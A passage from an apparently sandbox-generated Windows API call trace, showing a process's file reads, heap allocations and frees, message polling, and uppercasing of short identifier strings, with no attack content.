| out: lpNewFilePointer=0x0) returned 1 [0106.995] ReadFile (in: hFile=0x44c, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0xa120, lpOverlapped=0x0) returned 1 [0106.996] ReadFile (in: hFile=0x44c, lpBuffer=0x2aae878, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0106.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9538 | out: hHeap=0x2af0000) returned 1 [0106.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0106.996] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9520 | out: hHeap=0x2af0000) returned 1 [0106.996] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0106.997] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa120) returned 0x2a7a130 [0106.998] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x4cae020 | out: hHeap=0x2af0000) returned 1 [0107.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9568 | out: hHeap=0x2af0000) returned 1 [0107.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa94d8 | out: hHeap=0x2af0000) returned 1 [0107.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9448 | out: hHeap=0x2af0000) returned 1 [0107.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72708 | out: hHeap=0x2af0000) returned 1 [0107.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa95b0 | out: hHeap=0x2af0000) returned 1 [0107.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0107.000] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa97c0 | out: hHeap=0x2af0000) returned 1 [0107.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72708 [0107.000] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa120) returned 0x2a84258 [0107.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0107.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0107.001] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0107.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0107.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0107.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0107.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0107.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa120) returned 0x2a7a130 [0107.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0107.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a7a130 | out: hHeap=0x2af0000) returned 1 [0107.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72b58 | out: hHeap=0x2af0000) returned 1 [0107.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9808 | out: hHeap=0x2af0000) returned 1 [0107.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9688 | out: hHeap=0x2af0000) returned 1 [0107.001] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0107.001] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72628 [0107.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0107.001] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6ee0 [0107.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6ee0 | out: hHeap=0x2af0000) returned 1 [0107.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72738 | out: hHeap=0x2af0000) returned 1 [0107.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0107.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e880 [0107.002] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0107.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72738 [0107.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0107.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72628 [0107.002] CharUpperBuffW (in: lpsz="A2600502813", cchLength=0xb | out: lpsz="A2600502813") returned 0xb [0107.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0107.002] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72628 | out: hHeap=0x2af0000) returned 1 [0107.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa97c0 [0107.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72628 [0107.002] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9808 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9820 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b58 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa120) returned 0x2a7a130 [0107.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a08 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9688 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0107.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72b08 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96b8 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a38 [0107.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a38 | out: hHeap=0x2af0000) returned 1 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x1) returned 0x2a72a38 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa96e8 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72a58 [0107.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72a58 | out: hHeap=0x2af0000) returned 1 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9700 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fa8 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72a58 [0107.003] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9718 | out: hHeap=0x2af0000) returned 1 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78228 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9718 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72b18 [0107.003] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xa120) returned 0x2a8e380 [0107.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78390 [0107.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0107.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a72b28 [0107.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9790 | out: hHeap=0x2af0000) returned 1 [0107.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78250 [0107.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9790 [0107.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78098 [0107.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0107.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73068 [0107.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0107.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78278 [0107.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c10 [0107.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78318 [0107.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0107.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73118 [0107.004] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a60 | out: hHeap=0x2af0000) returned 1 [0107.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78188 [0107.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0107.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5de88 [0107.004] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.004] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0107.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730c8 [0107.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0107.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0107.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a73128 [0107.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0107.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0107.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0107.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0107.005] CharUpperBuffW (in: lpsz="SSA2600502813", cchLength=0xd | out: lpsz="SSA2600502813") returned 0xd [0107.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78160 | out: hHeap=0x2af0000) returned 1 [0107.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a73128 | out: hHeap=0x2af0000) returned 1 [0107.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0107.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0107.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a00 | out: hHeap=0x2af0000) returned 1 [0107.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730c8 | out: hHeap=0x2af0000) returned 1 [0107.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0107.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e680 [0107.005] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0107.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e680 | out: hHeap=0x2af0000) returned 1 [0107.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0107.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0107.005] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b50 | out: hHeap=0x2af0000) returned 1 [0107.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0107.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0107.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a60 [0107.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730c8 [0107.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78200 [0107.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0107.005] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a73128 [0107.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b20 | out: hHeap=0x2af0000) returned 1 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77fd0 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ac0 [0107.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0107.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0107.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0107.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9ad8 | out: hHeap=0x2af0000) returned 1 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ad8 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78048 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a716e8 [0107.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78070 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a00 [0107.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78020 | out: hHeap=0x2af0000) returned 1 [0107.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0107.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0107.006] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0107.006] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9af0 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71718 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77ff8 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71688 [0107.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b08 | out: hHeap=0x2af0000) returned 1 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78160 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b20 [0107.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0107.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0107.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0107.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bf8 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71868 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a783e0 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a717c8 [0107.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78020 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c28 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b08 [0107.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0107.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0107.007] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9bb0 | out: hHeap=0x2af0000) returned 1 [0107.007] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0107.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77f80 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9bb0 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71898 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78458 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0107.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782a0 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b50 [0107.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77f80 | out: hHeap=0x2af0000) returned 1 [0107.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0107.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a782c8 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a730a8 [0107.008] CharUpperBuffW (in: lpsz="A1100103809", cchLength=0xb | out: lpsz="A1100103809") returned 0xb [0107.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a782c8 | out: hHeap=0x2af0000) returned 1 [0107.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9940 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0107.008] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0107.008] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0107.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0107.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a780c0 [0107.009] CharUpperBuffW (in: lpsz="SSA1100103809", cchLength=0xd | out: lpsz="SSA1100103809") returned 0xd [0107.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a780c0 | out: hHeap=0x2af0000) returned 1 [0107.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b78 | out: hHeap=0x2af0000) returned 1 [0107.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0107.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99b8 | out: hHeap=0x2af0000) returned 1 [0107.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9940 | out: hHeap=0x2af0000) returned 1 [0107.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a730a8 | out: hHeap=0x2af0000) returned 1 [0107.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0107.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5ecc0 | out: hHeap=0x2af0000) returned 1 [0107.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a730a8 [0107.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a78408 [0107.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71908 [0107.009] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0107.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a78408 | out: hHeap=0x2af0000) returned 1 [0107.009] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71908 | out: hHeap=0x2af0000) returned 1 [0107.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9940 [0107.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a742c8 [0107.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71908 [0107.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0107.009] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99b8 